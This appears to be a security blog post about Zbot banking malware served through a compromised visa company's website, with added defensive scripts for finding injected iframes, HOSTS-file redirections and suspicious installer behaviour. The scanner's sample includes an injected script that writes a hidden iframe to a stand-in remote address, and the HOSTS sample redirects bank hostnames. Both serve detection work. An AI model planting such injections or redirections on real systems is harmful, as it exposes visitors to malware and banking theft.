More Zbot: Get a visa, get infected


We have previously blogged about Zbot banking Trojans being installed in various web attacks [1]. Since then, the authors have kept themselves busy. We have identified numerous malicious web sites using exploits to try to infect victims. Last week our colleagues at F-Secure blogged about Finnish spam linking to a site which infected visitors with a Zbot variant [2].

Earlier today I was investigating the site of a London-based company that specializes in helping clients obtain visas for international travel. We had reports of their site being infected with a malicious script (Troj/Unif-B). Sure enough, the site has been compromised with a malicious script that writes an iframe into the page in order to load content from a remote machine (in Russia). Multiple exploits are used in the attack, including:

In addition to these, some of the regular old favourites are being used (NCTAudio, WebViewFolderIcon, SuperBuddy, MDAC and friends).
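The injected script described above writes an iframe into the page so that the browser silently fetches content from a remote machine. The scanner below is an added example (not code from the original post or from Sophos) showing how a site owner can check their own pages for that pattern: it collects literal `<iframe>` tags, reverses the simple string-splitting trick (`'<if'+'rame'`) that injected scripts use to defeat naive greps, and flags any frame that points at a host other than the site's own, has zero-size dimensions, or is hidden by style. The site hostname, the sample page and the address `203.0.113.7` are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "visa-site.invalid"  # assumed hostname of the site being scanned

# Constructed sample page (not from the original post): one legitimate iframe and
# one written from script with the tag name split to defeat naive pattern matching.
SAMPLE_PAGE = """<html><body>
<h1>Visa services</h1>
<iframe src="/forms/apply.html" width="600" height="400"></iframe>
<script>document.write('<if'+'rame src="http://203.0.113.7/in.php" '+'width=0 height=0 style="visibility:hidden"></if'+'rame>');</script>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects attributes of literal <iframe> tags and the raw text of <script> blocks."""

    def __init__(self):
        super().__init__()
        self.iframes = []        # attribute dicts of <iframe> tags found in the markup
        self.scripts = []        # full source text of each <script> block
        self._buf = []           # chunks of the script block currently being read
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._buf, self._in_script = [], False

    def handle_data(self, data):
        # Script bodies may arrive in several chunks; join them at the closing tag.
        if self._in_script:
            self._buf.append(data)


def deobfuscate_concat(js):
    """Join simple string concatenations such as 'ab'+'cd' so split tag names reappear."""
    return re.sub(r"""['"]\s*\+\s*['"]""", "", js)


_ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def iframes_in_script(js):
    """Return attribute dicts for iframe tags that a script would write into the page."""
    found = []
    for m in re.finditer(r"<iframe\b([^>]*)>", deobfuscate_concat(js), re.I):
        attrs = {}
        for a in _ATTR_RE.finditer(m.group(1)):
            attrs[a.group(1).lower()] = a.group(2) or a.group(3) or a.group(4) or ""
        found.append(attrs)
    return found


def _tiny(value):
    """True for 0/1 pixel dimensions, the usual size of a frame meant to stay invisible."""
    return value.strip().strip("\"'").lower() in ("0", "1", "0px", "1px")


def suspicious_reasons(attrs, site_host):
    """Return the reasons an iframe looks injected; an empty list means it looks normal."""
    reasons = []
    host = urlparse(attrs.get("src", "")).hostname
    if host and host != site_host:
        reasons.append(f"loads from external host {host}")
    if _tiny(attrs.get("width", "100")) or _tiny(attrs.get("height", "100")):
        reasons.append("zero/one-pixel dimensions")
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden by style")
    return reasons


def scan_page(html, site_host):
    """Scan one page; return (where_found, src, reasons) for every suspicious iframe."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs in parser.iframes:
        reasons = suspicious_reasons(attrs, site_host)
        if reasons:
            findings.append(("markup", attrs.get("src", ""), reasons))
    for js in parser.scripts:
        for attrs in iframes_in_script(js):
            reasons = suspicious_reasons(attrs, site_host)
            if reasons:
                findings.append(("script", attrs.get("src", ""), reasons))
    return findings


if __name__ == "__main__":
    for where, src, reasons in scan_page(SAMPLE_PAGE, SITE_HOST):
        print(f"[{where}] {src}: {', '.join(reasons)}")
```

Run it over a saved copy of each page on the server; the legitimate application form frame passes, while the frame written by the script is reported for all three reasons. The deobfuscation step only handles plain string concatenation, so heavily encoded injections still need the page to be rendered in a browser or a JavaScript engine before scanning.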

The exploits attempt to install a Win32 downloader Trojan which in turn downloads a Zbot variant. Fortunately for Sophos users, both files are proactively detected as Mal/EncPk-CJ. If undetected and allowed to install, Zbot copies itself into the system directory using the somewhat notorious filename ntos.exe. There are many variants within this family, triggering generic detections such as Mal/EncPk-CJ, Mal/Zbot-A or Mal/Zbot-B. Once running, Zbot hides its own presence and that of some of its configuration/data files, as can be seen if you run an anti-rootkit scanner:

[Zbot stealthing]

(For readers not running a Sophos product who may be infected, I tested using Sophos’s free anti-rootkit scanner to remove Zbot and cleanup worked fine.)

Historically, Zbot banking malware has targeted multiple banking institutions, using a variety of techniques including:

  • screen capture
  • sniffing network traffic (hooking WS2_32.DLL and WSOCK32.DLL functions)
  • keylogging
  • clipboard
  • redirecting traffic (may modify HOSTS file in addition to hooking network functions)
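The last technique in the list, redirecting traffic by editing the HOSTS file, leaves a simple artefact that can be checked without a rootkit scanner. The script below is an added example (not code from the original post or from Sophos) of such a check: it parses a hosts file, ignores the loopback and unspecified entries that ad-blocking lists legitimately use, and reports every line that sends a non-local hostname to a routable address. The sample hosts content and the bank hostnames are constructed for the example.

```python
import ipaddress
import sys

# Constructed sample hosts file (not from the original post): the two default
# entries, a sinkhole line of the kind ad-blocking lists add, and one entry that
# points an online-banking hostname at an address the bank does not own.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.tracker.invalid
203.0.113.7     online.examplebank.invalid www.examplebank.invalid
"""

# Names that are expected to map to local addresses.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def is_sinkhole(ip):
    """Loopback and unspecified addresses block a name rather than redirect it."""
    return ip.is_loopback or ip.is_unspecified


def parse_hosts(text):
    """Yield (line_no, ip, [hostnames]) for each effective entry, comments removed."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed address: the resolver would ignore the line too
        yield line_no, ip, parts[1:]


def find_redirections(text):
    """Return (line_no, ip, [hostnames]) for entries that redirect a non-local name."""
    findings = []
    for line_no, ip, names in parse_hosts(text):
        if is_sinkhole(ip):
            continue
        redirected = [name for name in names if name.lower() not in LOCAL_NAMES]
        if redirected:
            findings.append((line_no, str(ip), redirected))
    return findings


if __name__ == "__main__":
    # Pass the real file path as the first argument, e.g.
    # C:\Windows\System32\drivers\etc\hosts; otherwise the constructed sample is used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            content = fh.read()
    else:
        content = SAMPLE_HOSTS
    for line_no, ip, names in find_redirections(content):
        print(f"line {line_no}: {', '.join(names)} -> {ip}")
```

Any line reported deserves attention, since a clean Windows hosts file normally contains only the loopback entries; a hostname you recognise as a bank or payment site mapped to an address you do not control is the redirection the list above describes.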

Users should make use of all the technologies Sophos provides to block this and other threats. In particular, suspicious file detections and runtime HIPS protection provide a vital layer against today's aggressive malware campaigns. As an example, if these Zbot variants were not already detected during a file scan, the user would still be protected by HIPS, which would block the installation (HIPS/RegMod-012 and HIPS/FileMod-001).
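The HIPS rules named above fire on behaviour rather than on file content: a process writing an executable into the system directory and modifying a registry autorun key is suspicious whatever the file looks like. The following is an added example (not Sophos code and not a description of how its rules are implemented) of the same idea in miniature: a small rule engine that evaluates a trace of file and registry events per process and blocks a process once it has matched both behaviours. The event trace, process ids and registry value names are constructed for the example; only the ntos.exe filename comes from the post.

```python
from collections import defaultdict

# Locations the rules care about, compared case-insensitively (Windows paths).
SYSTEM_DIR = r"c:\windows\system32"
RUN_KEYS = (
    r"hklm\software\microsoft\windows\currentversion\run",
    r"hkcu\software\microsoft\windows\currentversion\run",
)

# Constructed event trace (not from the original post): (pid, kind, target).
# Process 3307 behaves like the installer described in the post; 5002 is a normal
# application registering itself to start at logon, which alone is not enough to block.
SAMPLE_EVENTS = [
    (4120, "FileMod", r"C:\Users\alice\Downloads\visa-form.pdf"),
    (3307, "FileMod", r"C:\Windows\System32\ntos.exe"),
    (3307, "RegMod", r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\svc"),
    (5002, "RegMod", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater"),
]


def rule_exe_dropped_in_system_dir(kind, target):
    """FileMod rule: an executable written under the system directory."""
    t = target.lower()
    return kind == "FileMod" and t.startswith(SYSTEM_DIR + "\\") and t.endswith(".exe")


def rule_autorun_key_modified(kind, target):
    """RegMod rule: a value written directly under a Run key (RunOnce is excluded)."""
    t = target.lower()
    return kind == "RegMod" and any(t.startswith(key + "\\") for key in RUN_KEYS)


RULES = {
    "exe-dropped-in-system-dir": rule_exe_dropped_in_system_dir,
    "autorun-key-modified": rule_autorun_key_modified,
}


def evaluate(events):
    """Return {pid: set of rule names} for every process that matched at least one rule."""
    hits = defaultdict(set)
    for pid, kind, target in events:
        for name, rule in RULES.items():
            if rule(kind, target):
                hits[pid].add(name)
    return dict(hits)


def processes_to_block(events, threshold=2):
    """Processes whose matched rule count reaches the threshold; one hit only logs."""
    return sorted(pid for pid, names in evaluate(events).items() if len(names) >= threshold)


if __name__ == "__main__":
    for pid, names in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(f"pid {pid}: {', '.join(sorted(names))}")
    print("block:", processes_to_block(SAMPLE_EVENTS))
```

Requiring two independent behaviours before blocking is what keeps such rules usable: plenty of legitimate installers touch a Run key, far fewer also drop an executable into the system directory in the same run, and a real HIPS additionally weighs where the process came from and whether its file was already classified.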